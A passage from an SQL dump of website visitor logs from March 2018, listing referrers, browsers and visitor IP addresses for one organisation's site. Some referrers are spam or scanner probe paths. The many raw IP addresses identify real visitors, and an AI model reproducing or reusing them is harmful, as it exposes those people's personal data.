Next','Windows','44.0.2510.857','','46.30.165.47','000',2,0),(26370,'2018-03-11','http://transit.in.ua/','MSIE','Unknown','6.0','','178.137.18.222','000',2,0),(26371,'2018-03-11','https://www.google.com/','SamsungBrowser','Android','6.4','','107.77.234.48','000',4,0),(26372,'2018-03-11','https://zphiblgz.org','Chrome','Android','64.0.3282.137','','174.205.21.19','000',2,0),(26373,'2018-03-11','https://zphiblgz.org','Firefox','Windows','40.1','','51.39.232.156','000',2,0),(26374,'2018-03-11','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1722.suYEynEifGdeFa1zsbbxP3HjsBnC9tIFnoAaibl-N8KMQic4MQB3tQdBaH0MgGN7.5b18cea0b444fc97f301b03588988cc671059865&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YG-XUIUpxKrkaoPisARVvB8&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlkcHlQZDNhNHZYVUhWa085Qzd1SXFSY08wYmpGaENoTVBrYlQ4YzN3elhqR3hKeVF4WHAxY09LS3c2NmoxV2NUdw&b64e=2&sign=3dc4860e0bccc749e915c9452c55c241&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQULnoVAFacUfXmXwTBSXD_jHWI0HLhjCFKaxe9o7E-z8LQCrnAlCoxSMdCsIBsscjqJqO5TTMGwcj6c7RAFplU-cK7bzVuGe36a8dthHUOBsFu0YUARDOm7GzpWlEXy0QRKWuuJHinHq&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXboeqr305aIFZ6jt4hSj1dSBk8T1aK4aHFOBp6pPXXm0YRFXQSsHOA7-d-57iXP9nDBcq3F9Ja4Q&l10n=ru&cts=1520826884216&mc=2.38816259098','Firefox','Windows','38.0','','5.228.157.178','000',2,0),(26375,'2018-03-11','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.206','000',1,0),(26376,'2018-03-11','https://zphiblgz.org','Firefox','Windows','32.0','','5.196.213.40','000',2,0),(26377,'2018-03-11','https://zphiblgz.org','MSIE','Windows','6.0','','216.154.206.14','000',2,0),(26378,'2018-03-12','https://studentguide.ru/','Opera','Windows','7.54','','178.159.37.55','000',3,0),(26379,'2018-03-12','https://zphiblgz.org','Firefox','Windows','3.6.8','','89.234.68.90','000',9,0),(26380,'2018-03-12','https://zphiblgz.org','Firefox','Windows','3.6.8','','95.45.254.124','000',9,0),(26381,'2018-03-12','https://zphiblgz.org','AppleWebKit','Windows','534','','65.55.210.190','000',1,0),(26382,'2018-03-12','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(26383,'2018-03-12','https://dermatovenerologiya.com/','MSIE','Windows','6.0','','46.119.126.51','000',3,0),(26384,'2018-03-12','https://zphiblgz.org','Firefox','Windows','40.1','','186.154.39.247','000',2,0),(26385,'2018-03-12','http://zphiblgz.org/wp-info.php?up','Chrome','Windows','42.0.2311.152','','195.154.168.130','000',1,0),(26386,'2018-03-12','http://gazel-72.ru/','MSIE','Windows','3.02','','46.119.126.51','000',3,0),(26387,'2018-03-12','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','176.31.126.56','000',44,0),(26388,'2018-03-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.29','000',1,0),(26389,'2018-03-12','https://td-l-market.ru/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(26390,'2018-03-12','https://zphiblgz.org/','Chrome','Windows','57.0.2987.110','','62.122.94.141','000',2,0),(26391,'2018-03-12','https://zphiblgz.org','Chrome','Linux','34.0.1847.137','','66.240.192.138','000',1,0),(26392,'2018-03-12','https://zphiblgz.org','Firefox','Windows','54.0','','50.225.39.81','000',4,0),(26393,'2018-03-12','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.31','000',1,0),(26394,'2018-03-12','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.31','000',2,0),(26395,'2018-03-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','178.165.72.177','000',1,0),(26396,'2018-03-12','https://zphiblgz.org','Safari','iPhone','11.0','','50.225.39.89','000',5,0),(26397,'2018-03-12','https://zphiblgz.org/','Opera Next','Windows','50.0.2762.58','','149.202.50.209','000',1,0),(26398,'2018-03-12','https://zphiblgz.org','Firefox','Windows','40.1','','85.96.222.5','000',2,0),(26399,'2018-03-12','https://www.google.com/','Safari','iPad','11.0','','96.244.120.28','000',13,0),(26400,'2018-03-12','https://zphiblgz.org','Edge','Windows','15.15063','','50.225.39.78','000',5,0),(26401,'2018-03-12','https://zphiblgz.org','AppleWebKit','Windows','534','','157.55.39.172','000',2,0),(26402,'2018-03-12','https://zphiblgz.org','Firefox','Macintosh','52.0','','50.225.39.81','000',3,0),(26403,'2018-03-12','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','159.203.127.103','000',19,0),(26404,'2018-03-12','https://zphiblgz.org','MSIE','Windows','11.0','','216.99.180.220','000',5,0),(26405,'2018-03-12','http://elementspluss.ru/','MSIE','Windows','6.0','','134.249.53.158','000',2,0),(26406,'2018-03-12','https://zphiblgz.org','Safari','iPhone','11.0','','96.244.229.165','000',15,0),(26407,'2018-03-12','http://zahvat.ru/','MSIE','Windows','6.0','','178.137.18.222','000',1,0),(26408,'2018-03-12','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.32','000',1,0),(26409,'2018-03-12','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(26410,'2018-03-12','https://pills24h.com/buy-dapoxetine-online-without-prescription/','MSIE','Unknown','6.0','','46.119.126.51','000',3,0),(26411,'2018-03-12','https://buypuppies.ca/','MSIE','Windows','5.0','','134.249.53.158','000',2,0),(26412,'2018-03-12','http://komukc.com.ua/','Unknown','Unknown','Unknown','','178.159.37.55','000',3,0),(26413,'2018-03-12','https://zphiblgz.org','Firefox','Windows','40.1','','123.201.226.234','000',2,0),(26414,'2018-03-12','https://zphiblgz.org','Safari','iPhone','9.0','','96.83.92.5','000',1,0),(26415,'2018-03-12','https://zphiblgz.org/','Chrome','Android','65.0.3325.109','','69.143.112.183','000',3,0),(26416,'2018-03-12','https://zphiblgz.org','Chrome','Linux','26.0.1410.63','','35.201.200.252','000',8,0),(26417,'2018-03-12','https://zphiblgz.org/','Firefox','Windows','57.0','','37.187.89.212','000',1,0),(26418,'2018-03-12','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(26419,'2018-03-12','https://laminat.com.ua/','MSIE','Windows','6.0','','134.249.48.151','000',4,0),(26420,'2018-03-12','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(26421,'2018-03-12','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',3,0),(26422,'2018-03-12','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.32','000',1,0),(26423,'2018-03-12','https://zphiblgz.org','Safari','Macintosh','11.0.3','','100.16.228.140','000',17,0),(26424,'2018-03-12','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.27','000',1,0),(26425,'2018-03-12','https://www.google.com/','Chrome','Windows','64.0.3282.186','','96.70.148.105','000',3,0),(26426,'2018-03-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','212.47.246.21','000',1,0),(26427,'2018-03-12','http://www.zphibmaryland.org/chapters/','Chrome','Windows','65.0.3325.146','','69.195.247.116','000',3,0),(26428,'2018-03-12','https://zphiblgz.org','Chrome','Macintosh','65.0.3325.146','','100.16.228.140','000',10,0),(26429,'2018-03-12','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.212','000',1,0),(26430,'2018-03-12','https://search.yahoo.com/','Chrome','Windows','64.0.3282.186','','69.143.202.127','000',4,0),(26431,'2018-03-12','https://zphiblgz.org','Edge','Windows','16.16299','','100.16.228.140','000',13,0),(26432,'2018-03-12','https://www.google.com/','Chrome','Windows','64.0.3282.186','','129.2.58.84','000',4,0),(26433,'2018-03-12','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(26434,'2018-03-12','https://zphiblgz.org','Safari','iPhone','9.0','','175.42.0.55','000',1,0),(26435,'2018-03-12','https://zphiblgz.org','Safari','iPhone','9.0','','175.152.31.104','000',1,0),(26436,'2018-03-12','https://www.google.com/','Chrome','Android','64.0.3282.137','','73.201.199.79','000',2,0),(26437,'2018-03-12','https://zphiblgz.org','Safari','iPhone','11.0','','68.134.36.71','000',12,0),(26438,'2018-03-12','https://zphiblgz.org','Safari','Macintosh','11.0.3','','71.179.81.192','000',10,0),(26439,'2018-03-12','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.30','000',1,0),(26440,'2018-03-12','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.30','000',1,0),(26441,'2018-03-12','https://zphiblgz.org','AppleWebKit','Windows','534','','157.55.39.73','000',1,0),(26442,'2018-03-12','https://outlook.live.com/','Chrome','Chrome OS','59.0.3071.134','','96.234.182.174','000',2,0),(26443,'2018-03-12','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','52.165.148.51','000',2,0),(26444,'2018-03-12','https://zphiblgz.org','MSIE','Windows','6.0','','216.154.206.14','000',1,0),(26445,'2018-03-12','http://12u.info/','Opera','Windows','9.0','','178.159.37.55','000',3,0),(26446,'2018-03-12','https://zphiblgz.org','Chrome','Windows','55.0.2883.87','','46.183.217.34','000',3,0),(26447,'2018-03-13','https://zphiblgz.org','Safari','iPhone','11.0','','96.244.229.165','000',8,0),(26448,'2018-03-13','http://zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','195.154.187.58','000',1,0),(26449,'2018-03-13','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',2,0),(26450,'2018-03-13','https://www.google.com/','Chrome','Android','64.0.3282.137','','73.201.199.79','000',1,0),(26451,'2018-03-13','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.35','000',2,0),(26452,'2018-03-13','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.173','000',1,0),(26453,'2018-03-13','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(26454,'2018-03-13','https://zphiblgz.org','Firefox','Windows','40.1','','84.91.251.170','000',2,0),(26455,'2018-03-13','https://zphiblgz.org/','Firefox','Macintosh','57.0','','42.201.137.230','000',1,0),(26456,'2018-03-13','https://zphiblgz.org','Safari','Macintosh','10.1.2','','192.198.80.227','000',3,0),(26457,'2018-03-13','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.35','000',1,0),(26458,'2018-03-13','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.35','000',1,0),(26459,'2018-03-13','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.35','000',2,0),(26460,'2018-03-13','https://zphiblgz.org','Chrome','Chrome OS','64.0.3282.190','','69.143.35.179','000',9,0),(26461,'2018-03-13','https://zphiblgz.org','Firefox','Windows','40.1','','60.44.183.144','000',2,0),(26462,'2018-03-13','https://www.google.com/','Safari','iPhone','11.0','','50.225.39.75','000',2,0),(26463,'2018-03-13','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.35','000',1,0),(26464,'2018-03-13','https://zphiblgz.org/scholarship/','Edge','Windows','15.15063','','50.225.39.78','000',1,0),(26465,'2018-03-13','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.54.2','000',1,0),(26466,'2018-03-13','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.30','000',2,0),(26467,'2018-03-13','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.165.74','000',2,0),(26468,'2018-03-13','http://www.google.com/','Chrome','Android','63.0.3239.111','','124.140.0.244','000',2,0),(26469,'2018-03-13','https://zphiblgz.org','Firefox','Macintosh','52.0','','50.225.39.76','000',5,0),(26470,'2018-03-13','https://zphiblgz.org','Firefox','Windows','40.1','','59.182.190.5','000',2,0),(26471,'2018-03-13','https://zphiblgz.org','Safari','Macintosh','11.0.3','','71.179.81.192','000',4,0),(26472,'2018-03-13','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.29','000',1,0),(26473,'2018-03-13','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.29','000',1,0),(26474,'2018-03-13','https://zphiblgz.org','MSIE','Windows','11.0','','167.102.191.18','000',16,0),(26475,'2018-03-13','https://zphiblgz.org','AppleWebKit','Windows','534','','157.55.39.73','000',1,0),(26476,'2018-03-13','https://outlook.live.com/','Chrome','Windows','59.0.3071.109','','50.202.157.138','000',12,0),(26477,'2018-03-13','https://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.69','000',1,0),(26478,'2018-03-13','https://zphiblgz.org','Firefox','Windows','40.1','','83.23.247.217','000',2,0),(26479,'2018-03-13','https://zphiblgz.org','Opera','Windows','10.00','','13.231.66.102','000',1,0),(26480,'2018-03-13','https://zphiblgz.org','Edge','Windows','16.16299','','73.132.239.16','000',3,0),(26481,'2018-03-13','https://www.google.com/','Safari','iPhone','604.1','','50.225.39.77','000',2,0),(26482,'2018-03-13','https://www.google.com/','Safari','iPhone','11.0','','50.225.39.77','000',2,0),(26483,'2018-03-13','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','50.225.39.78','000',3,0),(26484,'2018-03-13','74.220.219.51','Firefox','Windows','33.0','','159.203.42.143','000',1,0),(26485,'2018-03-13','https://zphiblgz.org','Firefox','Windows','40.1','','43.230.198.81','000',2,0),(26486,'2018-03-13','https://zphiblgz.org','Chrome','Windows','44.0.2403.130','','193.93.218.82','000',1,0),(26487,'2018-03-13','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.9.24','000',1,0),(26488,'2018-03-13','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.9.28','000',1,0),(26489,'2018-03-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(26490,'2018-03-13','https://petrushka-restoran.ru/','MSIE','Windows','6.0','','46.119.126.51','000',1,0),(26491,'2018-03-13','https://www.google.com/','Chrome','Windows','64.0.3282.186','','73.129.22.251','000',3,0),(26492,'2018-03-13','https://zphiblgz.org','Firefox','Macintosh','58.0','','100.36.75.210','000',27,0),(26493,'2018-03-13','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(26494,'2018-03-13','https://www.google.com/','Chrome','Windows','63.0.3239.132','','198.203.175.175','000',2,0),(26495,'2018-03-13','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','174.205.3.22','000',13,0),(26496,'2018-03-13','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.30','000',1,0),(26497,'2018-03-13','http://fartunabest.ru/','MSIE','Unknown','6.0','','37.115.112.228','000',3,0),(26498,'2018-03-13','https://www.google.com/','Safari','Macintosh','11.0.3','','73.212.64.200','000',3,0),(26499,'2018-03-13','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','71.179.18.125','000',1,0),(26500,'2018-03-13','https://zphiblgz.org','Chrome','Android','65.0.3325.109','','61.37.245.152','000',3,0),(26501,'2018-03-13','https://zphiblgz.org','Safari','Macintosh','11.0.3','','100.16.228.140','000',12,0),(26502,'2018-03-13','https://www.google.com/','Chrome','Chrome OS','63.0.3239.140','','71.199.136.116','000',2,0),(26503,'2018-03-13','https://zphiblgz.org','Edge','Windows','16.16299','','69.250.75.251','000',2,0),(26504,'2018-03-13','https://zphiblgz.org','Chrome','Windows','64.0.3282.167','','173.64.123.159','000',7,0),(26505,'2018-03-13','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.30','000',1,0),(26506,'2018-03-13','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(26507,'2018-03-13','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.30','000',1,0),(26508,'2018-03-13','http://truebeauty.cc/','MSIE','Unknown','7.0b','','178.137.18.222','000',3,0),(26509,'2018-03-13','https://zphiblgz.org/author/przphiblgz-org/page/2','AppleWebKit','Windows','534','','199.30.24.110','000',1,0),(26510,'2018-03-13','https://zphiblgz.org','Edge','Windows','16.16299','','68.134.9.53','000',7,0),(26511,'2018-03-13','http://pospektr.ru/','Opera','Windows','8.00','','134.249.53.158','000',2,0),(26512,'2018-03-13','https://zphiblgz.org','Safari','Macintosh','11.0.3','','68.134.18.32','000',5,0),(26513,'2018-03-13','https://zphiblgz.org','Firefox','Macintosh','57.0','','71.127.150.254','000',12,0),(26514,'2018-03-13','https://shantanu.blog1989.com','Firefox','Windows','58.0','','112.5.248.142','000',2,0),(26515,'2018-03-13','https://www.google.com/','Chrome','Android','62.0.3202.84','','172.58.184.127','000',3,0),(26516,'2018-03-13','https://zphiblgz.org','Safari','Macintosh','8.0','','54.85.182.120','000',3,0),(26517,'2018-03-13','http://strady.org.ua/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(26518,'2018-03-13','https://mail.yahoo.com/','Chrome','Windows','64.0.3282.186','','71.121.167.97','000',3,0),(26519,'2018-03-13','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.31','000',1,0),(26520,'2018-03-13','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.31','000',1,0),(26521,'2018-03-13','https://zphiblgz.org','Edge','Windows','16.16299','','73.213.25.158','000',8,0),(26522,'2018-03-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','129.78.110.124','000',2,0),(26523,'2018-03-14','https://zphiblgz.org','Firefox','Windows','40.1','','103.14.198.82','000',2,0),(26524,'2018-03-14','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.88.43','000',2,0),(26525,'2018-03-14','https://picturesmania.com/','MSIE','Windows','6.0','','134.249.48.151','000',3,0),(26526,'2018-03-14','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',2,0),(26527,'2018-03-14','https://mamasuper.prom.ua/','MSIE','Windows','7.0a1','','178.137.18.222','000',3,0),(26528,'2018-03-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','46.17.97.112','000',1,0),(26529,'2018-03-14','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.29','000',1,0),(26530,'2018-03-14','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.29','000',1,0),(26531,'2018-03-14','https://zphiblgz.org','Firefox','Windows','40.1','','197.186.70.225','000',2,0),(26532,'2018-03-14','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','68.134.12.220','000',6,0),(26533,'2018-03-14','https://zphiblgz.org','Chrome','iPhone','65.0.3325.152','','96.244.213.109','000',5,0),(26534,'2018-03-14','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(26535,'2018-03-14','http://zphiblgz.org/','MSIE','Windows','11.0','','209.107.216.102','000',1,0),(26536,'2018-03-14','https://zphiblgz.org','Safari','iPhone','11.0','','107.77.204.184','000',2,0),(26537,'2018-03-14','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(26538,'2018-03-14','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.30','000',1,0),(26539,'2018-03-14','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.214','000',1,0),(26540,'2018-03-14','https://www.google.com/','Chrome','Windows','64.0.3282.186','','71.179.165.166','000',5,0),(26541,'2018-03-14','https://zphiblgz.org/scholarship/','Edge','Windows','15.15063','','50.225.39.78','000',1,0),(26542,'2018-03-14','https://www.google.com/','Chrome','Windows','64.0.3282.186','','108.239.204.248','000',1,0),(26543,'2018-03-14','https://kazka.ru/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(26544,'2018-03-14','https://zphiblgz.org','Firefox','Macintosh','52.0','','35.195.30.53','000',2,0),(26545,'2018-03-14','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(26546,'2018-03-14','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.30','000',1,0),(26547,'2018-03-14','https://pillscheap24h.com/','MSIE','Windows','6.0','','134.249.53.158','000',3,0),(26548,'2018-03-14','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','192.198.80.227','000',1,0),(26549,'2018-03-14','https://zphiblgz.org','Chrome','Windows','60.0.3112.113','','212.83.178.172','000',1,0),(26550,'2018-03-14','https://zphiblgz.org','Firefox','Macintosh','52.0','','35.205.84.222','000',37,0),(26551,'2018-03-14','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjRt4-SkOzZAhVHOKwKHTSADM0QFggpMAA&url=https%3A%2F%2Fzphiblgz.org%2Fts_teams%2Febony-cogdell%2F&usg=AOvVaw1p2aeVpuZ4yHcS8PFGQUXz','MSIE','Windows','11.0','','134.205.212.128','000',2,0),(26552,'2018-03-14','https://zphiblgz.org/scholarship/application/','Firefox','Windows','52.0','','46.161.9.56','000',3,0),(26553,'2018-03-14','https://nakozhe.com/','Unknown','Unknown','Unknown','','134.249.48.151','000',3,0),(26554,'2018-03-14','https://zphiblgz.org','Firefox','Windows','40.1','','193.198.96.60','000',2,0),(26555,'2018-03-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.29','000',1,0),(26556,'2018-03-14','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',1,0),(26557,'2018-03-14','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.35','000',1,0),(26558,'2018-03-14','https://www.google.com/','Safari','iPhone','604.1','','50.225.39.34','000',2,0),(26559,'2018-03-14','http://zphiblgz.org/','Safari','iPad','7.0','','195.22.127.67','000',3,0),(26560,'2018-03-14','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','50.225.39.35','000',13,0),(26561,'2018-03-14','https://www.google.com/','Chrome','Windows','65.0.3325.146','','50.225.39.35','000',5,0),(26562,'2018-03-14','https://zphiblgz.org','Safari','Macintosh','11.0.3','','100.16.228.140','000',2,0),(26563,'2018-03-14','https://zphiblgz.org','Chrome','Linux','34.0.1847.137','','66.240.236.119','000',4,0),(26564,'2018-03-14','https://zphiblgz.org/scholarship/recommendation/','AppleWebKit','Windows','534','','65.55.210.157','000',2,0),(26565,'2018-03-14','https://zphiblgz.org','Firefox','Windows','46.0','','50.225.39.35','000',3,0),(26566,'2018-03-14','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.119','','50.225.39.87','000',3,0),(26567,'2018-03-14','https://zphiblgz.org','Firefox','Windows','50.0','','50.225.39.34','000',5,0),(26568,'2018-03-14','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(26569,'2018-03-14','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(26570,'2018-03-14','https://zphiblgz.org','Chrome','Windows','64.0.3282.167','','173.64.123.159','000',9,0),(26571,'2018-03-14','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(26572,'2018-03-14','http://elementspluss.ru/','MSIE','Windows','5.5','','134.249.53.158','000',4,0),(26573,'2018-03-14','https://www.google.be/','Safari','iPhone','10.0','','81.245.199.4','000',4,0),(26574,'2018-03-14','https://zphiblgz.org','Safari','Macintosh','8.0','','54.85.182.120','000',5,0),(26575,'2018-03-14','https://zphiblgz.org','MSIE','Windows','11.0','','172.82.185.210','000',2,0),(26576,'2018-03-14','https://zphiblgz.org','Firefox','Windows','40.1','','176.24.147.198','000',2,0),(26577,'2018-03-14','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.29','000',1,0),(26578,'2018-03-14','http://whoiswho.crimea.ua/','MSIE','Windows','5.5','','178.137.18.222','000',3,0),(26579,'2018-03-14','http://zphiblgz.org/scholarship/','Chrome','Windows','64.0.3282.186','','73.173.254.31','000',1,0),(26580,'2018-03-14','http://stat.lviv.ua/','MSIE','Windows','7.0a1','','178.159.37.55','000',3,0),(26581,'2018-03-14','https://zphiblgz.org','Firefox','Windows','40.1','','131.196.146.218','000',2,0),(26582,'2018-03-14','https://zphiblgz.org','Safari','iPhone','11.0','','96.244.50.179','000',2,0),(26583,'2018-03-14','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.29','000',1,0),(26584,'2018-03-14','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(26585,'2018-03-14','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.29','000',1,0),(26586,'2018-03-14','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(26587,'2018-03-14','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.29','000',1,0),(26588,'2018-03-14','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.212','000',1,0),(26589,'2018-03-14','https://pills24h.com/buy-synthroid-levothyroxine-online-without-prescription/','Opera','Windows','8.00','','46.119.126.51','000',3,0),(26590,'2018-03-14','http://www.google.com/','Chrome','Android','65.0.3325.109','','108.18.197.245','000',6,0),(26591,'2018-03-14','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','73.133.254.145','000',2,0),(26592,'2018-03-14','https://zphiblgz.org/','Chrome','Windows','58.0.3029.96','','77.120.125.23','000',2,0),(26593,'2018-03-14','https://professionalsolutions.eu/ru/','Opera','Windows','7.54','','134.249.48.151','000',2,0),(26594,'2018-03-14','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',4,0),(26595,'2018-03-14','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(26596,'2018-03-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.26.144','000',12,0),(26597,'2018-03-15','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','158.69.26.144','000',1,0),(26598,'2018-03-15','https://zphiblgz.org','MSIE','Windows','11.0','','172.82.185.210','000',1,0),(26599,'2018-03-15','https://zphiblgz.org','Chrome','Windows','40.0.2214.115','','45.32.129.1','000',2,0),(26600,'2018-03-15','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.27.133','000',1,0),(26601,'2018-03-15','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.27.246','000',1,0),(26602,'2018-03-15','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.242.97','000',1,0),(26603,'2018-03-15','https://zphiblgz.org','Firefox','Linux','58.0','','64.26.151.55','000',1,0),(26604,'2018-03-15','https://zphiblgz.org','MSIE','Windows','6.0','','34.209.175.187','000',1,0),(26605,'2018-03-15','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',2,0),(26606,'2018-03-15','https://zphiblgz.org','MSIE','Windows','7.0','','34.209.182.200','000',2,0),(26607,'2018-03-15','https://zphiblgz.org','MSIE','Windows','9.0','','173.245.211.46','000',1,0),(26608,'2018-03-15','https://zphiblgz.org','MSIE','Windows','8.0','','173.245.211.46','000',1,0),(26609,'2018-03-15','https://zphiblgz.org','MSIE','Windows','11.0','','34.209.182.200','000',1,0),(26610,'2018-03-15','https://zphiblgz.org','MSIE','Windows','9.0','','23.83.37.179','000',1,0),(26611,'2018-03-15','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','54.183.137.118','000',1,0),(26612,'2018-03-15','https://zphiblgz.org','MSIE','Windows','8.0','','34.209.182.200','000',1,0),(26613,'2018-03-15','https://zphiblgz.org','MSIE','Windows','6.0','','34.209.182.200','000',1,0),(26614,'2018-03-15','https://zphiblgz.org','Firefox','Windows','40.1','','36.224.125.145','000',2,0),(26615,'2018-03-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.112','000',1,0),(26616,'2018-03-15','https://zphiblgz.org','Chrome','Unknown','64.0.3282.167','','138.197.111.95','000',3,0),(26617,'2018-03-15','https://zphiblgz.org/','MSIE','Windows','9.0','','31.130.21.164','000',2,0),(26618,'2018-03-15','http://03e.info/','MSIE','Unknown','6.0','','178.159.37.55','000',3,0),(26619,'2018-03-15','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.35','000',1,0),(26620,'2018-03-15','https://www.sundrugstore.com/','MSIE','Windows','6.0','','134.249.48.151','000',3,0),(26621,'2018-03-15','http://sameday-essay.com','Firefox','Windows','40.1','','77.120.125.23','000',2,0),(26622,'2018-03-15','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.32','000',1,0),(26623,'2018-03-15','https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&ved=0ahUKEwidhaqfl-7ZAhVHL6wKHWBwD2YQjRwIBg&url=https%3A%2F%2Fzphiblgz.org%2Fhistory%2F&psig=AOvVaw09YLSJ1pNuCKDPaMjHxDEi&ust=1521197628464643','MSIE','Windows','11.0','','137.9.121.122','000',1,0),(26624,'2018-03-15','https://zphiblgz.org','Firefox','Windows','40.1','','81.64.40.80','000',2,0),(26625,'2018-03-15','https://zphiblgz.org','Edge','Windows','15.15063','','50.225.39.78','000',4,0),(26626,'2018-03-15','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','50.225.39.82','000',2,0),(26627,'2018-03-15','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(26628,'2018-03-15','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.30','000',1,0),(26629,'2018-03-15','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(26630,'2018-03-15','https://zphibl